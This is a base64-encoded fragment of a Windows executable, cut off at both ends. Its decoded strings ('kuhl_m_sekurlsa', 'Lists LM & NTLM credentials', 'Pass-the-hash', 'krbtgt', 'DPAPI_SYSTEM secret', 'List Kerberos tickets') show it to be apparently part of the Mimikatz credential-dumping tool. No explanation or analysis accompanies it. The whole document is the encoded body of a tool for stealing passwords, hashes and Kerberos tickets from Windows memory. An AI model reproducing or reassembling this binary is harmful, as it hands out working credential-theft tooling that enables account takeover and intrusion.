AA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAPABOAFUATABMAD4AAAAAAFQAYQByAGcAZQB0AE4AYQBtAGUAIAA6ACAAJQBzACAALwAgACUAcwAKAFUAcwBlAHIATgBhAG0AZQAgACAAIAA6ACAAJQBzAAoAQwBvAG0AbQBlAG4AdAAgACAAIAAgADoAIAAlAHMACgBUAHkAcABlACAAIAAgACAAIAAgACAAOgAgACUAdQAgAC0AIAAlAHMACgBQAGUAcgBzAGkAcwB0ACAAIAAgACAAOgAgACUAdQAgAC0AIAAlAHMACgBGAGwAYQBnAHMAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAEMAcgBlAGQAZQBuAHQAaQBhAGwAIAA6ACAAAAAKAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA6ACAAJQB1AAoAAAAgAFsAJQAyAHUAXQAgAEEAdAB0AHIAaQBiAHUAdABlAAoAAAAgACAARgBsAGEAZwBzACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAgACAASwBlAHkAdwBvAHIAZAAgADoAIAAlAHMACgAAACAAIABWAGEAbAB1AGUAIAAgACAAOgAgAAAAAABpAG4AZgBvAHMAAABtAGkAbgBlAHMAdwBlAGUAcABlAHIAAABNAGkAbgBlAFMAdwBlAGUAcABlAHIAIABtAG8AZAB1AGwAZQAAAAAAbQBpAG4AZQBzAHcAZQBlAHAAZQByAC4AZQB4AGUAAABGAGkAZQBsAGQAIAA6ACAAJQB1ACAAcgAgAHgAIAAlAHUAIABjAAoATQBpAG4AZQBzACAAOgAgACUAdQAKAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABNAGUAbQBvAHIAeQAgAEMAIAAoAFIAIAA9ACAAJQB1ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AZQBtAG8AcgB5ACAAUgAKAAAAAAAlAEMAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEIAbwBhAHIAZAAgAGMAbwBwAHkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAYQBtAGUAIABjAG8AcAB5AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABHACAAYwBvAHAAeQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwBsAG8AYgBhAGwAIABjAG8AcAB5AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAAUwBlAGEAcgBjAGgAIABpAHMAIABLAE8ACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBpAG4AZQBzAHcAZQBlAHAAZQByACAATgBUACAASABlAGEAZABlAHIAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBpAG4AZQBzAHcAZQBlAHAAZQByACAAUABFAEIACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATgBvACAATQBpAG4AZQBTAHcAZQBlAHAAZQByACAAaQBuACAAbQBlAG0AbwByAHkAIQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAGUAbABlAG0AZQBuAHQAcwAgAGYAcgBvAG0AIABjAG8AbAB1AG0AbgA6ACAAJQB1AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAcgBlAGYAZQByAGUAbgBjAGUAcwAgAGYAcgBvAG0AIABjAG8AbAB1AG0AbgA6ACAAJQB1AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIAByAGUAZgBlAHIAZQBuAGMAZQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIABmAGkAcgBzAHQAIABlAGwAZQBtAGUAbgB0AAoAAABsAHMAYQBzAHIAdgAAAAAATHNhSUNhbmNlbE5vdGlmaWNhdGlvbgAATHNhSVJlZ2lzdGVyTm90aWZpY2F0aW9uAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbgB0ADUAXwBpAG4AaQB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBzAGUAYQByAGMAaAAKAAAAAABiAGMAcgB5AHAAdAAAAAAAQkNyeXB0T3BlbkFsZ29yaXRobVByb3ZpZGVyAEJDcnlwdFNldFByb3BlcnR5AAAAQkNyeXB0R2V0UHJvcGVydHkAAABCQ3J5cHRHZW5lcmF0ZVN5bW1ldHJpY0tleQAAQkNyeXB0RW5jcnlwdAAAAEJDcnlwdERlY3J5cHQAAABCQ3J5cHREZXN0cm95S2V5AAAAAEJDcnlwdENsb3NlQWxnb3JpdGhtUHJvdmlkZXIAAAAAMwBEAEUAUwAAAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBCAEMAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQAAAAAATwBiAGoAZQBjAHQATABlAG4AZwB0AGgAAAAAAEEARQBTAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBGAEIAAABtAHMAdgAAAEwAaQBzAHQAcwAgAEwATQAgACYAIABOAFQATABNACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAdwBkAGkAZwBlAHMAdAAAAEwAaQBzAHQAcwAgAFcARABpAGcAZQBzAHQAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABMAGkAcwB0AHMAIABLAGUAcgBiAGUAcgBvAHMAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAHQAcwBwAGsAZwAAAEwAaQBzAHQAcwAgAFQAcwBQAGsAZwAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAGwAaQB2AGUAcwBzAHAAAABMAGkAcwB0AHMAIABMAGkAdgBlAFMAUwBQACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAcwBzAHAAAABMAGkAcwB0AHMAIABTAFMAUAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAGwAbwBnAG8AbgBQAGEAcwBzAHcAbwByAGQAcwAAAAAATABpAHMAdABzACAAYQBsAGwAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHAAcgBvAHYAaQBkAGUAcgBzACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAAAFMAdwBpAHQAYwBoACAAKABvAHIAIAByAGUAaQBuAGkAdAApACAAdABvACAATABTAEEAUwBTACAAcAByAG8AYwBlAHMAcwAgACAAYwBvAG4AdABlAHgAdAAAAAAAbQBpAG4AaQBkAHUAbQBwAAAAAABTAHcAaQB0AGMAaAAgACgAbwByACAAcgBlAGkAbgBpAHQAKQAgAHQAbwAgAEwAUwBBAFMAUwAgAG0AaQBuAGkAZAB1AG0AcAAgAGMAbwBuAHQAZQB4AHQAAAAAAHAAdABoAAAAUABhAHMAcwAtAHQAaABlAC0AaABhAHMAaAAAAGsAcgBiAHQAZwB0ACEAAABkAHAAYQBwAGkAcwB5AHMAdABlAG0AAABEAFAAQQBQAEkAXwBTAFkAUwBUAEUATQAgAHMAZQBjAHIAZQB0AAAAdABpAGMAawBlAHQAcwAAAEwAaQBzAHQAIABLAGUAcgBiAGUAcgBvAHMAIAB0AGkAYwBrAGUAdABzAAAAZQBrAGUAeQBzAAAATABpAHMAdAAgAEsAZQByAGIAZQByAG8AcwAgAEUAbgBjAHIAeQBwAHQAaQBvAG4AIABLAGUAeQBzAAAATABpAHMAdAAgAEMAYQBjAGgAZQBkACAATQBhAHMAdABlAHIASwBlAHkAcwAAAAAAYwByAGUAZABtAGEAbgAAAEwAaQBzAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABNAGEAbgBhAGcAZQByAAAAAABzAGUAawB1AHIAbABzAGEAAAAAAFMAZQBrAHUAcgBMAFMAQQAgAG0AbwBkAHUAbABlAAAAAAAAAFMAbwBtAGUAIABjAG8AbQBtAGEAbgBkAHMAIAB0AG8AIABlAG4AdQBtAGUAcgBhAHQAZQAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAuAC4ALgAAAFMAdwBpAHQAYwBoACAAdABvACAAUABSAE8AQwBFAFMAUwAKAAAAAABTAHcAaQB0AGMAaAAgAHQAbwAgAE0ASQBOAEkARABVAE0AUAAgADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbQBpAG4AaQBkAHUAbQBwACAAOwAgADwAbQBpAG4AaQBkAHUAbQBwAGYAaQBsAGUALgBkAG0AcAA+ACAAYQByAGcAdQBtAGUAbgB0ACAAaQBzACAAbQBpAHMAcwBpAG4AZwAKAAAAAAAAAAAATwBwAGUAbgBpAG4AZwAgADoAIAAnACUAcwAnACAAZgBpAGwAZQAgAGYAbwByACAAbQBpAG4AaQBkAHUAbQBwAC4ALgAuAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATABTAEEAUwBTACAAcAByAG8AYwBlAHMAcwAgAG4AbwB0ACAAZgBvAHUAbgBkACAAKAA/ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIABwAEkAbgBmAG8AcwAtAD4ATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAoACUAdQApACAAIQA9ACAATQBJAE0ASQBLAEEAVABaAF8ATgBUAF8ATQBBAEoATwBSAF8AVgBFAFIAUwBJAE8ATgAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIABwAEkAbgBmAG8AcwAtAD4AUAByAG8AYwBlAHMAcwBvAHIAQQByAGMAaABpAHQAZQBjAHQAdQByAGUAIAAoACUAdQApACAAIQA9ACAAUABSAE8AQwBFAFMAUwBPAFIAXwBBAFIAQwBIAEkAVABFAEMAVABVAFIARQBfAEkATgBUAEUATAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABNAGkAbgBpAGQAdQBtAHAAIAB3AGkAdABoAG8AdQB0ACAAUwB5AHMAdABlAG0ASQBuAGYAbwBTAHQAcgBlAGEAbQAgACgAPwApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEsAZQB5ACAAaQBtAHAAbwByAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEwAbwBnAG8AbgAgAGwAaQBzAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AbwBkAHUAbABlAHMAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AZQBtAG8AcgB5ACAAbwBwAGUAbgBpAG4AZwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAASABhAG4AZABsAGUAIABvAG4AIABtAGUAbQBvAHIAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAG8AYwBhAGwAIABMAFMAQQAgAGwAaQBiAHIAYQByAHkAIABmAGEAaQBsAGUAZAAKAAAAAAAJACUAcwAgADoACQAAAAAAVQBuAGQAZQBmAGkAbgBlAGQATABvAGcAbwBuAFQAeQBwAGUAAAAAAFUAbgBrAG4AbwB3AG4AIAAhAAAASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAATgBlAHQAdwBvAHIAawAAAEIAYQB0AGMAaAAAAFMAZQByAHYAaQBjAGU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